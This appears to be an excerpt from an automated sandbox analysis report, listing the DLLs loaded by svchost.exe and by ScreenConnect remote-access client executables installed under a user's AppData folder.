                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
